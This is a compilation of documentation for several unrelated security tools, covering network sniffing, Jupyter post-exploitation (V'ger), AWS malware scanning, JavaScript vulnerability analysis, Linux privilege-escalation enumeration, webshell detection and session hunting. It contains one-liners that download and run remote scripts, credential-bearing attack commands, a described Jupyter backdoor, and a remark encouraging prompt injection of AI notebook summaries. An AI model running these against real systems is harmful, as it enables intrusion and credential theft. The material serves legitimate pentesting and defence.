Tools: What tool can be used to launch an attack;
Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.
Mitigation: Recommendations for fixing the security problems
Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses
You can install Above directly from the Kali Linux repositories
caster@kali:~$ sudo apt update && sudo apt install above
Or...
caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install
# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools
# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install
Don't forget to deactivate your firewall on macOS!
Above requires root access for sniffing
Above can be run with or without a timer:
caster@kali:~$ sudo above --interface eth0 --timer 120
To stop traffic sniffing, press CTRL + C
WARNING! Above is not designed to work with tunnel interfaces (L3) due to its use of filters for L2 protocols. The tool may not work properly on tunneled L3 interfaces.
Example:
caster@kali:~$ sudo above --interface eth0 --timer 120
-----------------------------------------------------------------------------------------
[+] Start sniffing...
[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------
If you need to record the sniffed traffic, use the --output
argument
caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap
If you interrupt the tool with CTRL+C, the traffic is still written to the file
If you already have some recorded traffic, you can use the --input
argument to look for potential security issues
caster@kali:~$ above --input ospf-md5.cap
Example:
caster@kali:~$ sudo above --input ospf-md5.cap
[+] Analyzing pcap file...
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
The tool can detect hosts without noise in the air by processing ARP frames in passive mode
caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10
[+] Host discovery using Passive ARP
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------
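A minimal Scapy sketch of the same passive ARP idea (illustrative, not Above's actual code): listen for ARP replies and record hosts without ever sending a frame.

```python
from scapy.all import ARP, sniff

seen = {}

def handle(pkt):
    if pkt.haslayer(ARP) and pkt[ARP].op == 2:  # op 2 = ARP reply (is-at)
        ip, mac = pkt[ARP].psrc, pkt[ARP].hwsrc
        if ip not in seen:
            seen[ip] = mac
            print(f"[+] Detected ARP Reply: {ip} is at {mac}")

# store=0 avoids keeping packets in memory; sniffing requires root
sniff(filter="arp", prn=handle, store=0, timeout=10)
```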
I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.
V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.
pip install vger
vger --help
Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by name in non-interactive format with vger <module>. List available modules with vger --help.
Once a connection is established, users drop into a nested set of menus.
The top level menu is:
- Reset: Configure a different host.
- Enumerate: Utilities to learn more about the host.
- Exploit: Utilities to perform direct action and manipulation of the host and artifacts.
- Persist: Utilities to establish persistence mechanisms.
- Export: Save output to a text file.
- Quit: No one likes quitters.
These menus contain the following functionality:
- List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code.
- Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in the runtime of the notebook.
- Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root, on a user-specified port with a user-specified password.
- Check History: See ipython commands recently run in the target notebook.
- Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal.
- List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /.
- Upload file: Upload a file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension.
- Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory).
- Find models: Find models based on common file formats.
- Download models: Download discovered models.
- Snoop: Monitor notebook execution and results until timeout.
- Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.
With pip install vger[ai] you'll get LLM-generated summaries of notebooks in the target environment. These are meant to be a rough translation for non-DS/AI folks to quickly triage whether (or which) notebooks are worth investigating further.
There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").
It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient, as modern malware uses various obfuscation techniques. Server admins may lack historical visibility into security events across all servers. Determining compromised systems and safe backups to restore from during incidents is challenging without centralized monitoring and alerting. It is onerous for server admins to set up and maintain additional security tools for advanced threat detection. A rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.
Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.
The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.
This combo of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine safe recovery point in time backups for restoration by identifying timeline of compromises through centralized threat analytics.
AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.
Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.
AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.
The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and Amazon GuardDuty & AWS Security Hub are enabled. The cdk stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.
Amazon Security Hub enabled. If not, please check this documentation
Warning
Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to setup DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change encryption settings to use your own KMS key in the DRS console.
Create a Cloud9 environment with an Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 has node v16, which is no longer supported since 2023-09-11.
git clone https://github.com/aws-samples/drs-malware-scan
cd drs-malware-scan
sh check_loggroup.sh
Deploy the CDK stack by running the following command in the Cloud9 terminal and confirm the deployment
npm install
cdk bootstrap
cdk deploy --all
Note
The solution is made of 2 stacks:
* DrsMalwareScanStack: deploys all resources needed for the malware scanning feature. This stack is mandatory. If you want to deploy only this stack, you can run cdk deploy DrsMalwareScanStack
* ScanReportStack: deploys the resources needed for reporting (AWS Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack, you can run cdk deploy ScanReportStack
If you want to deploy both stacks, you can run cdk deploy --all
All Lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting the corresponding CloudWatch log groups; look for the /aws/lambda/DrsMalwareScanStack-* pattern.
The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations
lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.
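A hedged boto3 sketch of what such an annotation could look like (this is not the solution's actual Lambda code; the finding identifiers and updater name are placeholders):

```python
import boto3

securityhub = boto3.client("securityhub")

def annotate_finding(finding_id, product_arn, source_servers):
    # BatchUpdateFindings attaches a note naming the DRS source server(s)
    securityhub.batch_update_findings(
        FindingIdentifiers=[{"Id": finding_id, "ProductArn": product_arn}],
        Note={
            "Text": "DRS source server(s) with malware: "
                    + ", ".join(source_servers),
            "UpdatedBy": "DrsMalwareScan",  # hypothetical updater name
        },
    )
```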
The SQS FIFO queues can be monitored using the Messages available and Messages in flight metrics in the AWS SQS console
The DRS Volume Annotations DynamoDB table keeps track of the status of each malware scan operation.
Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan
In order to analyze logs from Amazon GuardDuty malware scan operations, you can check the /aws/guardduty/malware-scan-events
Amazon CloudWatch log group. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.
Run the following commands in your terminal:
cdk destroy --all
(Optional) Delete the CloudWatch log groups associated with Lambda Functions.
For the purpose of this analysis, we have assumed a fictitious scenario to take as an example. The following cost estimates are based on services located in the North Virginia (us-east-1) region.
Monthly Cost | Total Cost for 12 Months |
---|---|
171.22 USD | 2,054.74 USD |
Service Name | Description | Monthly Cost (USD) |
---|---|---|
AWS Elastic Disaster Recovery | 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period | 71.41 |
Amazon GuardDuty | 3 TB Malware Scanned/Month | 94.56 |
Amazon DynamoDB | 100MB 1 Read/Second 1 Writes/Second | 3.65 |
AWS Security Hub | 1 Account / 100 Security Checks / 1000 Finding Ingested | 0.10 |
AWS EventBridge | 1M custom events | 1.00 |
Amazon Cloudwatch | 1GB ingested/month | 0.50 |
AWS Lambda | 5 ARM Lambda Functions - 128MB / 10secs | 0.00 |
Amazon SQS | 2 SQS Fifo | 0.00 |
Total | | 171.22 |
Note: The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details, please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments, it is advisable to include a Business Support Plan (not considered in the estimation).
See CONTRIBUTING for more information.
An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.
This project is licensed under the GNU Affero General Public License v3.0. See here for more information.
JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.
Release Notes:
- JAW-V2 is available in the JAW-V2 branch.
- JAW-V1 is available in the JAW-V1 branch.
The architecture of JAW is shown below.
JAW can be used in two distinct ways:
Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.
Web Application Analysis: Analyze a web application by providing a single seed URL.
Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.
Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).
Query the constructed Neo4j
graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.
JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.
The outputs will be stored in the same folder as the input.
The installation script relies on the following prerequisites:
- Latest version of the npm package manager (Node.js)
- Any stable version of Python 3.x
- The Python pip package manager
Afterwards, install the necessary dependencies via:
$ ./install.sh
For detailed installation instructions, please see here.
You can run an instance of the pipeline in a background screen via:
$ python3 -m run_pipeline --conf=config.yaml
The CLI provides the following options:
$ python3 -m run_pipeline -h
usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]
This script runs the tool pipeline.
optional arguments:
-h, --help show this help message and exit
--conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
--site SITE, -S SITE website to test; overrides config file (default: None)
--list LIST, -L LIST site list to test; overrides config file (default: None)
--from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
--to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)
Input Config: JAW expects a .yaml
config file as input. See config.yaml for an example.
Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).
For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:
$ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js
This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScript file that you already have on your file system, you can skip this step.
JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.
This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:
$ cd crawler
$ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>
The foxhoundpath
is by default set to the following directory: crawler/foxhound/firefox
which contains a binary named firefox
.
Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.
To start the crawler, do:
$ cd crawler
$ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true
See here for more information.
To start the crawler, do:
$ cd crawler/hpg_crawler
$ vim docker-compose.yaml # set the websites you want to crawl here and save
$ docker-compose build
$ docker-compose up -d
Please refer to the documentation of the hpg_crawler
here for more information.
To generate an HPG for a given (set of) JavaScript file(s), do:
$ node engine/cli.js --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv
optional arguments:
--lang: language of the input program
--graphid: an identifier for the generated HPG
--input: path of the input program(s)
--output: path of the output HPG (must be inside the data directory)
--mode: determines the output format (csv or graphML)
To import an HPG inside a neo4j graph database (docker instance), do:
$ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
$ python3 -m hpg_neo4j.hpg_import -h
usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]
This script imports a CSV of a property graph into a neo4j docker database.
optional arguments:
-h, --help show this help message and exit
--rpath P relative path to the folder containing the graph CSV files inside the `data` directory
--id I an identifier for the graph or docker container
--nodes N the name of the nodes csv file (default: nodes.csv)
--edges E the name of the relations csv file (default: rels.csv)
In order to create a hybrid property graph for the output of the hpg_crawler
and import it inside a local neo4j instance, you can also do:
$ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>
Specification of Parameters:
<path>
: absolute path to the folder containing the program files for analysis (must be under the engine/outputs
folder).--js=<program.js>
: name of the JavaScript program for analysis (default: js_program.js
).--import=<bool>
: whether the constructed property graph should be imported to an active neo4j database (default: true).--hybrid=bool
: whether the hybrid mode is enabled (default: false
). This implies that the tester wants to enrich the property graph by inputing files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.--reqs=<requests.out>
: for hybrid mode only, name of the file containing the sequence of observed network requests, pass the string false
to exclude (default: request_logs_short.out
).--evts=<events.out>
: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false
to exclude (default: events.out
).--cookies=<cookies.pkl>
: for hybrid mode only, name of the file containing the cookies, pass the string false
to exclude (default: cookies.pkl
).--html=<html_snapshot.html>
: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false
to exclude (default: html_rendered.html
).For more information, you can use the help CLI provided with the graph construction API:
$ python3 -m engine.api -h
The constructed HPG can then be queried using Cypher or the NeoModel ORM.
You should place and run your queries in analyses/<ANALYSIS_NAME>
.
You can use the NeoModel ORM to query the HPG. To write a query:
example_query_orm.py
in the analyses/example
folder.$ python3 -m analyses.example.example_query_orm
For more information, please see here.
You can use Cypher to write custom queries. For this:
example_query_cypher.py
in the analyses/example
folder.$ python3 -m analyses.example.example_query_cypher
For more information, please see here.
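As an illustration, a custom Cypher query could also be issued with the official neo4j Python driver; the connection details and the Type property filter below are assumptions for the sketch, not JAW's documented API:

```python
from neo4j import GraphDatabase

# Placeholders: adjust the bolt URI, credentials, and property names to
# match your imported HPG instance.
driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "neo4j"))
with driver.session() as session:
    # Hypothetical query: fetch a few call-expression nodes from the graph
    result = session.run(
        "MATCH (n) WHERE n.Type = 'CallExpression' RETURN n LIMIT 10")
    for record in result:
        print(record["n"])
driver.close()
```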
This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF, DOM Clobbering, and request hijacking.
Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:
request_hijacking:
enabled: true
# [...]
#
domclobbering:
enabled: false
# [...]
cs_csrf:
enabled: false
# [...]
Step 2. Run an instance of the pipeline with:
$ python3 -m run_pipeline --conf=config.yaml
Hint. You can run multiple instances of the pipeline under different screen
s:
$ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
$ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
$ # [...]
To generate parallel configuration files automatically, you may use the generate_config.py
script.
The outputs will be stored in a file called sink.flows.out
in the same folder as that of the input. For Client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a. semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC']
is forgeable through the window.location
injection point. However, a request marked with ['NON-REACH']
is not forgeable.
An example output entry is shown below:
[*] Tags: ['WIN.LOC']
[*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
[*] Location: 29
[*] Function: ajax
[*] Template: ajaxloc + "/bearer1234/"
[*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })
1:['WIN.LOC'] variable=ajaxloc
0 (loc:6)- var ajaxloc = window.location.href
This entry shows that on line 29 there is a $.ajax call expression, and this call expression triggers an ajax request with the URL template value of ajaxloc + "/bearer1234/", where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, and is thus forgeable through ['WIN.LOC'].
In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js
web application which you can test JAW with.
First, install the dependencies via:
$ cd tests/test-webapp
$ npm install
Then, run the application in a new screen:
$ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'
For more information, visit our wiki page here. Below is a table of contents for quick access.
Pull requests are always welcomed. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.
If you use the JAW for academic research, we encourage you to cite the following paper:
@inproceedings{JAW,
title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
author= {Soheil Khodayari and Giancarlo Pellegrino},
booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
year = {2021},
address = {Vancouver, B.C.},
publisher = {{USENIX} Association},
}
JAW has come a long way and we want to give our contributors a well-deserved shoutout here!
@tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.
First, a couple of useful oneliners ;)
wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh
Note that since version 2.10
you can serve the script to other hosts with the -S
flag!
Linux enumeration tools for pentesting and CTFs
This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.
Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.
This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.
From version 2.0 it is mostly POSIX compliant and tested with shellcheck
and posh
.
It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests, so you save some time. By default it monitors for 1 minute, but you can choose the watch time with the -p parameter.
It has 3 levels of verbosity so you can control how much information you see.
In the default level you should see the highly important security flaws in the system. The level 1
(./lse.sh -l1
) shows interesting information that should help you to privesc. The level 2
(./lse.sh -l2
) will just dump all the information it gathers about the system.
By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.
The idea is to get the information gradually.
First you should execute it just like ./lse.sh
. If you see some green yes!
, you probably have already some good stuff to work with.
If not, you should try the level 1
verbosity with ./lse.sh -l1
and you will see some more information that can be interesting.
If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find it useful to use ./lse.sh -l2 | less -r.
You can also select what tests to execute by passing the -s
parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro
will execute the test usr010
and all the tests in the sections net
and pro
.
Use: ./lse.sh [options]
OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurrent tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.
Also available in webm video
Direct execution oneliners
bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i
ShellSweeping the evil
"ShellSweep" is a PowerShell/Python/Lua tool designed to detect potential webshell files in a specified directory.
ShellSweep and its suite of tools calculate the entropy of file contents to estimate the likelihood of a file being a webshell. High entropy indicates more randomness, which is a characteristic of the encrypted or obfuscated code often found in webshells.
- It only processes files with certain extensions (.asp, .aspx, .asph, .php, .jsp), which are commonly used in webshells.
- Certain directories can be excluded from scanning.
- Files with certain hashes can be ignored during the scan.
Entropy, in the context of information theory or data science, is a measure of the unpredictability, randomness, or disorder in a set of data. The concept was introduced by Claude Shannon in his 1948 paper "A Mathematical Theory of Communication".
When applied to a file or a string of text, entropy can help assess the randomness of the data. Here's how it works: If a file consists of completely random data (each byte is just as likely to be any value between 0 and 255), the entropy is high, close to 8 (since log2(256) = 8).
If a file consists of highly structured data (for example, a text file where most bytes are ASCII characters), the entropy is lower. In the context of finding webshells or malicious files, entropy can be a useful indicator:
- Many obfuscated scripts or encrypted payloads can have high entropy because the obfuscation or encryption process makes the data look random.
- A normal text file or HTML file would generally have lower entropy because human-readable text has patterns and structure (certain letters are more common, words are usually separated by spaces, etc.).
So, a file with unusually high entropy might be suspicious and worth further investigation. However, it's not a surefire indicator of maliciousness -- there are plenty of legitimate reasons a file might have high entropy, and plenty of ways malware might avoid causing high entropy. It's just one tool in a larger toolbox for detecting potential threats.
ShellSweep includes a Get-Entropy function that calculates the entropy of a file's contents by:
- Counting how often each character appears in the file.
- Using these frequencies to calculate the probability of each character.
- Summing -p*log2(p) for each character, where p is the character's probability. This is the formula for entropy in information theory.
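For illustration, here is a minimal Python sketch of the same Shannon entropy calculation (ShellSweep ships its own PowerShell, Python, and Lua implementations; this is not the tool's code, and the input filename is hypothetical):

```python
import math
from collections import Counter

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)  # how often each byte value appears
    # Sum -p * log2(p) over every byte value present in the file
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

# Hypothetical input file; ~8.0 suggests random/obfuscated, lower = structured
with open("suspect.aspx", "rb") as f:
    print(f"{entropy(f.read()):.4f}")
```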
ShellScan provides the ability to scan multiple known bad webshell directories and output the average, median, minimum and maximum entropy values by file extension.
Pass ShellScan.ps1 some directories of webshells, any size set. I used:
This will give a decent training set to get entropy values.
Output example:
Statistics for .aspx files:
Average entropy: 4.94212121048115
Minimum entropy: 1.29348709979974
Maximum entropy: 6.09830238020383
Median entropy: 4.85437969842084
Statistics for .asp files:
Average entropy: 5.51268104400858
Minimum entropy: 0.732406213077191
Maximum entropy: 7.69241278153711
Median entropy: 5.57351177724806
First, let's break down the usage of ShellCSV and how it assists with identifying the entropy of known-good files on disk. The idea is that defenders can run this on web servers to gather all files and entropy values to better understand what paths and extensions are most prominent in their working environment.
See ShellCSV.csv as example output.
First, choose your flavor: Python, PowerShell or Lua.
If you made it here, this is the part where you iterate on tuning. Find new shell? Gather entropy and modify as needed.
Feel free to open a Git issue.
If you enjoyed this project, be sure to star the project and share with your family and friends.
Retrieve and display information about active user sessions on remote computers. No admin privileges required.
The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.
If the -CheckAsAdmin switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results).
It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.
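For illustration only, the same registry-based session discovery can be sketched in Python with pywin32 (Invoke-SessionHunter itself is PowerShell; the target hostname below is a placeholder):

```python
import winreg
import win32security

target = r"\\WORKSTATION01"   # hypothetical target
hive = winreg.ConnectRegistry(target, winreg.HKEY_USERS)

i = 0
while True:
    try:
        name = winreg.EnumKey(hive, i)
    except OSError:
        break  # no more subkeys
    i += 1
    # Loaded user hives appear as SIDs like S-1-5-21-...; skip _Classes keys
    if name.startswith("S-1-5-21-") and not name.endswith("_Classes"):
        sid = win32security.ConvertStringSidToSid(name)
        user, domain, _ = win32security.LookupAccountSid(None, sid)
        print(f"{target}: {domain}\\{user}")
```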
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')
If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry
Invoke-SessionHunter
Gather sessions by authenticating to targets where you have local admin access
Invoke-SessionHunter -CheckAsAdmin
You can optionally provide credentials in the following format
Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"
You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.
This works in combination with -Timeout (default = 2); increase it for slower networks.
Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -FailSafe -Timeout 5
Use the -Match switch to show only targets where you have admin access and a privileged user is logged in
Invoke-SessionHunter -Match
All switches can be combined
Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match
Invoke-SessionHunter -Domain contoso.local
Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt
Invoke-SessionHunter -Servers
Invoke-SessionHunter -Workstations
Invoke-SessionHunter -Hunt "Administrator"
Invoke-SessionHunter -IncludeLocalHost
Invoke-SessionHunter -RawResults
Note: if a host is not reachable it will hang for a while
Invoke-SessionHunter -NoPortScan
Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns or stealing user cookies. Typically, this happens when the subdomain has a CNAME record in DNS, but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
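Conceptually, the check resembles the following Python sketch (Subhunter itself is written in Go; dnspython, requests, and the single fingerprint string here are illustrative assumptions, whereas the real tool matches a set of service fingerprints):

```python
import dns.resolver   # pip install dnspython
import dns.exception
import requests

def check_takeover(subdomain: str):
    try:
        cname = dns.resolver.resolve(subdomain, "CNAME")[0].target.to_text()
    except dns.exception.DNSException:
        return  # no CNAME record at all
    try:
        body = requests.get(f"http://{subdomain}", timeout=10).text
    except requests.RequestException:
        return
    # A dangling CNAME to an unclaimed service often returns a telltale body
    if "The specified bucket does not exist" in body:  # example fingerprint
        print(f"[+] Possible takeover at {subdomain} (CNAME -> {cname})")

check_takeover("test.example.com")
```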
